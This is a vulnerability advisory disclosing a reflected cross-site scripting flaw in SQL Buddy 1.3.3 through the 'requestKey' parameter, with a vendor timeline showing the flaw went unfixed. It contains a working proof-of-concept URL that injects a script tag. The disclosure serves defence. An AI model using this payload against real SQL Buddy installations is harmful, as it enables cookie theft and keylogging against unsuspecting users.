SQL Buddy 1.3.3: XSS
Date: 2015-10-07 15:47:311. Introduction
| Affected Product: | SQL Buddy 1.3.3 |
| Fixed in: | not fixed |
| Fixed Version Link: | n/a |
| Vendor Contact: | nom@deliciousbrains.com |
| Vulnerability Type: | XSS |
| Remote Exploitable: | Yes |
| Reported to vendor: | 08/18/2015 |
| Disclosed to public: | 10/07/2015 |
| Release mode: | Full Disclosure |
| CVE: | n/a |
| Credits | Tim Coen of curesec GmbH |
2. Vulnerability Description
There is an XSS vulnerability via the "requestKey" GET parameter in SQL Buddy 1.3.3. With this, it is possible to steal cookies or inject JavaScript keyloggers.
Please note that the POC only works if the victim is not logged in.
3. Proof of Concept
http://localhost/sqlbuddy/index.php?ajaxRequest=1&requestKey="></script><script>alert(1)</script>
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
| 08/18/2015 | Informed Vendor about Issue (no reply) |
| 09/16/2015 | Reminded Vendor of release date (no reply) |
| 10/07/2015 | Disclosed to public |